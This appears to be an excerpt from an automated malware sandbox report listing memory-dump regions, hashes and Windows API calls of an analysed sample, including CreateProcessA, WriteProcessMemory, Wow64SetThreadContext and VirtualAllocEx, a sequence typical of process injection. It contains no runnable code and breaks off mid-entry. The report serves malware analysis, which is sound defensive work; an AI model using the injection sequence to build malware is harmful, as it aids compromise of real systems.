                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q$`Q]q
                                                          • API String ID: 0-2790359648
                                                          • Opcode ID: b907a69bba142d8d93ce34f6f7921be5248b67debee1b0712525ece04b6d5d20
                                                          • Instruction ID: 5dcf3da5cfaed2258edac85ff9f714db65c7a43b98c8ac1c200444833110f3fd
                                                          • Opcode Fuzzy Hash: b907a69bba142d8d93ce34f6f7921be5248b67debee1b0712525ece04b6d5d20
                                                          • Instruction Fuzzy Hash: 72B1EFB4D44269CFDB60CF24DC49BA9BBB9BB49351F0041EAC64AA7284DB741AC5CF09

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385221527.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 61ae8c240f62d5286793b97da98b25517a4b73a413dc0aa159af4936b0b5e8b9
                                                          • Instruction ID: eb9f8cdb8fdcfc14d4e4753fd0fd184ae6b314a953b5dc66ebf92bcc4c61465e
                                                          • Opcode Fuzzy Hash: 61ae8c240f62d5286793b97da98b25517a4b73a413dc0aa159af4936b0b5e8b9
                                                          • Instruction Fuzzy Hash: 5D91BD74E01248CFCF98DFA9D4586EDBBB2FF49215F109029D42AB7290CB356942CF60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <$>
                                                          • API String ID: 0-3803789803
                                                          • Opcode ID: a6681f3e197a991812911e8cd15bd21cf094a7ed00f21adc620763b8c71cb8b8
                                                          • Instruction ID: 09d8898dc611d4eda8a2b1f543e757d529975c737a085e3ce1965b66f82b5b3f
                                                          • Opcode Fuzzy Hash: a6681f3e197a991812911e8cd15bd21cf094a7ed00f21adc620763b8c71cb8b8
                                                          • Instruction Fuzzy Hash: E8419074A41258CFDBA4DF58C888B9DBBB2BB89304F1484AAD509B7350CB395EC9CF10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <$>
                                                          • API String ID: 0-3803789803
                                                          • Opcode ID: 86c532f45809731361a197f8ff265b62c5240617350a5391c8a1aec956aa7886
                                                          • Instruction ID: 8e61d37f0db367abba0f2fa99d1f9f3d85636eb51f74f9d770cb70bd8f9d2a29
                                                          • Opcode Fuzzy Hash: 86c532f45809731361a197f8ff265b62c5240617350a5391c8a1aec956aa7886
                                                          • Instruction Fuzzy Hash: 76419F74A41258CFEBA4DF58C888B9DBBB2BB89304F1484AAD509B7340D7395E898F10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: )$A
                                                          • API String ID: 0-955135197
                                                          • Opcode ID: 812a78a3d4cbb607655f7121acc4bfb62bf0e42188e44c8088ef584cee4a8a0a
                                                          • Instruction ID: b73dba2508b4e818635295b304d8d366ae622d96c493b3bc8ecfad3e8998b7c5
                                                          • Opcode Fuzzy Hash: 812a78a3d4cbb607655f7121acc4bfb62bf0e42188e44c8088ef584cee4a8a0a
                                                          • Instruction Fuzzy Hash: 1D21AD74A45228CFDB94DF68C848BD9BBB6FB49708F1081E9D40DA7241DB359E858F40
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06E90B62
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 203fc011f21514f7519d2d70f9fc49db634ed03ccf619b3070b4f3205c6f04c1
                                                          • Instruction ID: 53f31bc9703b58b572ea84281a58a1dfc3629ca6ea9b70f4b83bcce9ae1c10f5
                                                          • Opcode Fuzzy Hash: 203fc011f21514f7519d2d70f9fc49db634ed03ccf619b3070b4f3205c6f04c1
                                                          • Instruction Fuzzy Hash: B8813571D003599FDF50CFA9C8817EEBBF2BF48318F548529E858A7254E7B49881CB91
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06E90B62
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 07a2d7a91d2d1ab7a7d547b2127ed8d439a4492f878c90a3cf2d299ed8b2c5ab
                                                          • Instruction ID: 177eca0edb53a049ccc99642e8c4a8333ebd300ff91b114f5f425cb904561456
                                                          • Opcode Fuzzy Hash: 07a2d7a91d2d1ab7a7d547b2127ed8d439a4492f878c90a3cf2d299ed8b2c5ab
                                                          • Instruction Fuzzy Hash: 2D813471D003598FDF50CFA9C8817EEBBF2BF48318F548529E818A7294E7B49881CB91
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06E91F08
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: a6779e73f083a4a033e5de1058764b423e89bdc35fa079194121140d4423d71b
                                                          • Instruction ID: 741c52c6f5e875d3d52e634b1241e31ff59ecac14a3f0b564f247da93e1ee77e
                                                          • Opcode Fuzzy Hash: a6779e73f083a4a033e5de1058764b423e89bdc35fa079194121140d4423d71b
                                                          • Instruction Fuzzy Hash: A52146B19003499FCB10CFAAC881BEEBBF5FF48314F108429E918A7240C7789940CBA4
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06E91F08
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: a67a8bf49b02fc9c1878feba0f91cfeb681519b9efd2c1cc88ddcac201e6e9cf
                                                          • Instruction ID: b783002b8e875a5d33d4a459d0c9e37de6b7da96b2790c04b22a22f3db35140e
                                                          • Opcode Fuzzy Hash: a67a8bf49b02fc9c1878feba0f91cfeb681519b9efd2c1cc88ddcac201e6e9cf
                                                          • Instruction Fuzzy Hash: D92124B59003499FCB10DFAAC985BEEBBF5FF48314F10842AE919A7240D7789944CBA4
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E92606
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 101c89bafb13886d43ee6354f0aa11f94acaebcca202ceda1d6fce2ddcaa0c0f
                                                          • Instruction ID: fe772e670eebcc1a7e247ee2bd0c3c186921338dd9280a0250ee4d6520ea585f
                                                          • Opcode Fuzzy Hash: 101c89bafb13886d43ee6354f0aa11f94acaebcca202ceda1d6fce2ddcaa0c0f
                                                          • Instruction Fuzzy Hash: C6217CB1D103089FCB10DFAAC485BEEBBF4EF48314F10842AD519A7241CB789A44CFA5
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E92606
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: ce8c2e0ff5e86b2dc11a4da28cd8e51228aaa09296bcd71b937ea19570868d86
                                                          • Instruction ID: d7aa31b7dea9016751bd5108939ebead21626ba31d768541b2feb959fd938a19
                                                          • Opcode Fuzzy Hash: ce8c2e0ff5e86b2dc11a4da28cd8e51228aaa09296bcd71b937ea19570868d86
                                                          • Instruction Fuzzy Hash: 442149B1D103099FDB10DFAAC485BEEBBF4EF48314F108429D519A7241CB78AA44CFA5
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06EAD7FC
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386216821.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6ea0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: f54e784c6cddf024dc0a1df0cc7ec5cb8fb9500e356976bc835a5ca3039f6b8d
                                                          • Instruction ID: e6250f94f4043f506ac9131f0d41ffbdd28553333ab670cc8187b1dd833bec20
                                                          • Opcode Fuzzy Hash: f54e784c6cddf024dc0a1df0cc7ec5cb8fb9500e356976bc835a5ca3039f6b8d
                                                          • Instruction Fuzzy Hash: E22139758003499FDB10DFAAC881AEEFBF5EF48320F108429D429A7240DB389545CFA1
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 06C7037C
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385136098.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 5a1f109fbf87a93365dfa6cb9a14231f5bb2c6aa4badad5c404161c10bb8dcc9
                                                          • Instruction ID: c82a8354cec6ea47f3e0e1b05192d524fee7b6d5c3cb196505b311f9de9805e0
                                                          • Opcode Fuzzy Hash: 5a1f109fbf87a93365dfa6cb9a14231f5bb2c6aa4badad5c404161c10bb8dcc9
                                                          • Instruction Fuzzy Hash: 302115B1D002489FCB20DFAAC884AEEFBF5FF48314F20842AD459A7250C7799945CFA1
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06EAD7FC
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386216821.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6ea0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 0c26c1cb48daef680719d473cd00c107c69979ac85e8488ff631cccbf8a476c3
                                                          • Instruction ID: 10bb2c109629f10d809b27ba2e76086c29f06d26bcb3169452002f41b26fe9fb
                                                          • Opcode Fuzzy Hash: 0c26c1cb48daef680719d473cd00c107c69979ac85e8488ff631cccbf8a476c3
                                                          • Instruction Fuzzy Hash: 842104B18003498EDB10DFAAC845AAEBBF5EF48324F508429D419A7240CB78A945CBA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386216821.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6ea0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: d3d62acc9173d27367c7638e2f8f196845e6d2409b4baedb1b2a574946e919b5
                                                          • Instruction ID: 62fe2eac73f777d9244dec0db44c1fc94c522f561f311aa1c394e47e3e129071
                                                          • Opcode Fuzzy Hash: d3d62acc9173d27367c7638e2f8f196845e6d2409b4baedb1b2a574946e919b5
                                                          • Instruction Fuzzy Hash: 0B116D719003598ACB10DFAAC845BEEFFF8EF48724F24841AD415A7280DB38A944CBA5
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E92BFE
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: c645e22cc5c2c2d46cc7fd901134f78ba93cb6edcd6d380564ce03b4a739485b
                                                          • Instruction ID: d07a845fcbebe1995f0e185c2fbee85eb9fed42d2634520533de6f414eb86e43
                                                          • Opcode Fuzzy Hash: c645e22cc5c2c2d46cc7fd901134f78ba93cb6edcd6d380564ce03b4a739485b
                                                          • Instruction Fuzzy Hash: 04114775800249DFCF10DFAAC845AEEFBF5EF48314F108419E519A7250C7759540CBA5
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 06C7037C
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385136098.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 67046f29498d5cc514770fa5ee055a89a446a2acf842fb2c073d18a97c5e70c3
                                                          • Instruction ID: 35df6fee3a49810fb245127b340cf3999f5788c67d3d882c8d8408ba29d2b505
                                                          • Opcode Fuzzy Hash: 67046f29498d5cc514770fa5ee055a89a446a2acf842fb2c073d18a97c5e70c3
                                                          • Instruction Fuzzy Hash: 441106B1D002499FCB10DFAAC884AEEFBF5FF48314F10842AD419A7250C779A944CFA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386216821.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6ea0000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 0474f38c1e1da631e1f1c4d6dcc2d18b6a0518f7d6920efdc43630eb065e01f8
                                                          • Instruction ID: dd41bb55ed32224f8256be59eeca6c45b4ab3e8ce37853a73d875a40a5b87cd4
                                                          • Opcode Fuzzy Hash: 0474f38c1e1da631e1f1c4d6dcc2d18b6a0518f7d6920efdc43630eb065e01f8
                                                          • Instruction Fuzzy Hash: 7C1137B19003498ADB10DFAAC845BEEFBF9AF49714F24841AD459A7240CB38A944CBA4
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E92BFE
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 01bca5955c317202dd4e298b6f134bb149d9ba014699b88601b08b927fee5580
                                                          • Instruction ID: bd2790399ea4bd5f383174bfa9de386dffe29eb5a0b83dc27ff9c53e3345f3df
                                                          • Opcode Fuzzy Hash: 01bca5955c317202dd4e298b6f134bb149d9ba014699b88601b08b927fee5580
                                                          • Instruction Fuzzy Hash: 741137719002499FCF10DFAAC845AEEBFF5EF48314F208419E519A7250C779A944CFA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q
                                                          • API String ID: 0-3168235125
                                                          • Opcode ID: 3f8fa22ea0578ec4f427c2228a107a1a330d9b3ff059bcecece58fd0ae06831f
                                                          • Instruction ID: 19892c8a8fb7181786d3a29c29f9922e4fa08af8fdbe5e9394b13a8231217a44
                                                          • Opcode Fuzzy Hash: 3f8fa22ea0578ec4f427c2228a107a1a330d9b3ff059bcecece58fd0ae06831f
                                                          • Instruction Fuzzy Hash: 22C19E74906269CFEB64DF25CD88BADBBB5BB48301F0091EAD44AA3245DB745EC5CF80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %
                                                          • API String ID: 0-2567322570
                                                          • Opcode ID: 72a6dedd0600206992bc069fad34298d7374e9e26f9c8deeaa27443c6751029d
                                                          • Instruction ID: cee821a4173d95d39accfca2c022159cd915495447ba9018c4c396b1e87289b7
                                                          • Opcode Fuzzy Hash: 72a6dedd0600206992bc069fad34298d7374e9e26f9c8deeaa27443c6751029d
                                                          • Instruction Fuzzy Hash: 7041BD74A402588FEBA4DF68C884BD9BBB2FB49304F1484A9D509B7240DB395EC98F60
                                                          Strings
                                                          Memory Dump Source
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06C7135B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385136098.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 770da4e6a16d2b71870ffe3c01aee3faef193dd8ab4add51dfb11b2c2e761ded
                                                          • Instruction ID: d663fc2eeb28c0ed1c168fb7d0c30d2600c1675d2e427e6f0cbcaa3a0e561f6f
                                                          • Opcode Fuzzy Hash: 770da4e6a16d2b71870ffe3c01aee3faef193dd8ab4add51dfb11b2c2e761ded
                                                          • Instruction Fuzzy Hash: 8641DE78A023188FDB94DF68D884B9DBBB2FB89304F1485A9D419A7351DB386E84CF51
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79ef6808bdf3d8eb1396f32ac2186af3bbaa97f8771b05c2bdc704de3b8e24ab
                                                          • Instruction ID: bd4d7143052d7572d8c9f5b98ea9d8947f4e3af0eb242737d8a1180db1334a30
                                                          • Opcode Fuzzy Hash: 79ef6808bdf3d8eb1396f32ac2186af3bbaa97f8771b05c2bdc704de3b8e24ab
                                                          • Instruction Fuzzy Hash: 3B3119B1D002599FDB14CFA9C980AEEBFF5BF48304F248429E519AB350DB349946CFA0
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6515957f42b30e1fe4b88b6d3f5599169b757336ce1967983efef4828a07c6d4
                                                          • Instruction ID: 675fe0490680ab585a48d00bd13d8988bd257c80ab8a4d69eedf46b8fcca5b9c
                                                          • Opcode Fuzzy Hash: 6515957f42b30e1fe4b88b6d3f5599169b757336ce1967983efef4828a07c6d4
                                                          • Instruction Fuzzy Hash: 5731C370E45209DFDF84CF69D841AAEBBF6EB8A300F04C0A9D419A7251D7399D85CFA0
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf9fabb5d4d1f038d97a0d0581802172cd1e5c81060e4d456faa6fff427dee23
                                                          • Instruction ID: 202fa24be86e472341c1f648a25fb2e567ef6668642a1d9fb343edc15d06246d
                                                          • Opcode Fuzzy Hash: bf9fabb5d4d1f038d97a0d0581802172cd1e5c81060e4d456faa6fff427dee23
                                                          • Instruction Fuzzy Hash: B3217E30B04305DFCB04AFA8C85467D7BBAFB89204B20053DE4079B354DB7A9D478B96
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90e3ebeba25d88d136c858caf45f2d505d4eec837a5268fe81f47cca16f4f415
                                                          • Instruction ID: d63a6aa79534246bb4cd812b7d156587cec704918d0921cc698ccf90d1495f5d
                                                          • Opcode Fuzzy Hash: 90e3ebeba25d88d136c858caf45f2d505d4eec837a5268fe81f47cca16f4f415
                                                          • Instruction Fuzzy Hash: 2D3119B0D002589FDB14DFAAC990ADEFFF5AF49344F248429E919AB350DB349945CFA0
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c70cb2e0c8ac52d87e96282b7d65bf5832937830dd375dc2f3284931f8440606
                                                          • Instruction ID: b52d18ff8f7f7ac04b1a933627a0c949ec08072ddbc1e4f3435c07e81d807555
                                                          • Opcode Fuzzy Hash: c70cb2e0c8ac52d87e96282b7d65bf5832937830dd375dc2f3284931f8440606
                                                          • Instruction Fuzzy Hash: 91410678E012198FDB94DF68D894BADB7B2FB89304F0080A9D95DA7351DB396D89CF40
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f80f9c68c43f0e0d586d993b75838cf3f0889040f89ff92fbcc4eb47e997c2aa
                                                          • Instruction ID: f4270448708d645d1af33248bdf47593a4516210e43524dbd5c2a254cb975da1
                                                          • Opcode Fuzzy Hash: f80f9c68c43f0e0d586d993b75838cf3f0889040f89ff92fbcc4eb47e997c2aa
                                                          • Instruction Fuzzy Hash: 8F315C70E052098FEB88CF69D8416EEBBF6EB89300F1480A9D519A7291D7795945CF90
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c15a82494a06331960e40feef8acea3dcb1ad7e652e9b9322c839c9533ec87ff
                                                          • Instruction ID: a63a7c075d96978e12c9775fc520244c63bdce18afd3441a81015c560e83039d
                                                          • Opcode Fuzzy Hash: c15a82494a06331960e40feef8acea3dcb1ad7e652e9b9322c839c9533ec87ff
                                                          • Instruction Fuzzy Hash: 47219C31704300CFCB05AB68D49457C77B6EB89218B24057DE4039B399CF7A9C879792
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5e58233fbc4c5116e6224c74ad40a04400bf8d36baaf45ce0744f5e66747d6a
                                                          • Instruction ID: 1fd7cde0d870ad868bb2e6595f672a5d13be2371be357602f85015c0bedcb788
                                                          • Opcode Fuzzy Hash: e5e58233fbc4c5116e6224c74ad40a04400bf8d36baaf45ce0744f5e66747d6a
                                                          • Instruction Fuzzy Hash: A0216B75D44209DFDB44DFA9D8006EEBBB6FB89304F108069D514A3381D7784A45CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8be1beca154be2d8f04112fcdd2fac81185d51e5252a515b2e828cbd8f92af5d
                                                          • Instruction ID: ef6b84a040444142f3238c1afbbe2db0bc0c139e796307e70db95c51cc6f594b
                                                          • Opcode Fuzzy Hash: 8be1beca154be2d8f04112fcdd2fac81185d51e5252a515b2e828cbd8f92af5d
                                                          • Instruction Fuzzy Hash: 8031AE74A412588FDBA4DF58C884B99BBB2BB4A304F1484EAD50DB7250DB399EC9CF10
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367007653.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_139d000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62da447e7620055881b6ebb1fda9636c5dabfe7699c2bd915e44daf494816841
                                                          • Instruction ID: faf5044d9d8e703d673eafdad3efdf66519b5e6c5586d602d22bedf085e74b7b
                                                          • Opcode Fuzzy Hash: 62da447e7620055881b6ebb1fda9636c5dabfe7699c2bd915e44daf494816841
                                                          • Instruction Fuzzy Hash: 3F2103B2504204DFCF15DF58D9C5B26BF69FB84318F20C569D9090B356C33AD406CAA2
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7960dc31bc747f43bac1c80ef2cd1d3d262ec3cfffb7e5bb9e06c39e38855386
                                                          • Instruction ID: 7c012afab467561f7d37b8c88ee9dd74ec050986d3b01678da4d26aa5c388e29
